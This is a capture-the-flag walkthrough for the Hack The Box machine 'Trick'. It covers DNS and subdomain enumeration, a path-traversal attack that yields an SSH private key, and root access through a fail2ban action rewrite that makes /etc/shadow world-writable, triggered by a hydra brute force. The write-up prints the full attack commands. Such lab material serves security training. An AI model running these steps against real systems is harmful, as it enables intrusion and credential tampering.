HTB - Trick - Walkthrough [ hackthebox ]

NETWORK

ENUMERATION

DNS Enumeration

Let’s attempt to get a domain name for the IP address using nslookup.

We have found trick.htb

Let’s try a zone transfer on this domain.

host -l trick.htb 10.10.11.166 > zonetransfer.txt

Unfortunately, the domain transfer didn’t give us any more subdomain.

Using the following dig command dig @10.10.11.166 trick.htb axfr we were successful at retrieving some subdomain

Host enumeration

The host enumeration has given us an extra option: preprod-marketing.trick.htb

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: preprod-FUZZ.trick.htb" -u http://trick.htb -fs 5480 -s

Let’s add trick.htb, root.trick.htb,preprod-payroll.trick.htb and preprod-marketing.trick.htb to our /etc/host file

preprod-payroll.trick.htb

preprod-marketing.trick.htb

Using dotdotpown with the following command

/usr/sbin/dotdotpwn -u http://preprod-marketing.trick.htb/index.php\?page\=TRAVERSAL -M GET -m http-url -k root -q -b

we are able to reveal a local file injection on the server

We know have Michael ssh private key

FOOTHOLD

Using Michael ssh key, we can access the machine

Privilege Escalation via fail2ban

fail2ban is a great IDPS tool, not only it can detect attacks but also block the malicious IP addresses by using Linux iptables.

Fail2ban daemon reads the log files and if there is a malicious pattern detected (e.g multiple failed login requests) it executes a command for blocking the IP for certain period of time or maybe forever.

Checking we can see it is running:

Looking at config we see it’s protecting ssh

Checking version installed we see it’s old:

Running the following command on the server

CMD='chmod 777 /etc/shadow'; sed -i -E "s\actionban =.*\actionban = $CMD\g" /etc/fail2ban/action.d/iptables-multiport.conf;sed -i -E "s\actionunban =.*\actionunban = $CMD\g" /etc/fail2ban/action.d/iptables-multiport.conf; cat /etc/fail2ban/action.d/iptables-multiport.conf | grep actionunban;cat /etc/fail2ban/action.d/iptables-multiport.conf | grep actionban;sudo /etc/init.d/fail2ban restart

changes the files actionunban and actionban in /etc/fail2ban/action.d/iptables-multiport.conf which are the commands that are run when the fail2ban detect a positive attack. This is possible because we have writing permissions on the folder /etc/fail2ban/action.d/

To trigger the fail2ban actions we use the following hydra command which is a SSH brute force (with a fake user to trigger errors)

hydra -l tom -P /usr/share/wordlists/rockyou.txt 10.10.11.166 ssh -v

Thanks to this command we then get

We then have to generate a password with the following command

python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Then replacing the password of user root with the generated password in /etc/shadow

root:$6$salt$uoy3eLWQ8ZK7dv2FoRxQrkOYfc4FT4qDjc1PCObX5vKn4MZgpfwn8Fm0Ve5u63zmaabiFiQWOZeF2qZDQk18Q0:19194:0:99999:7:::

Gives us access to the root account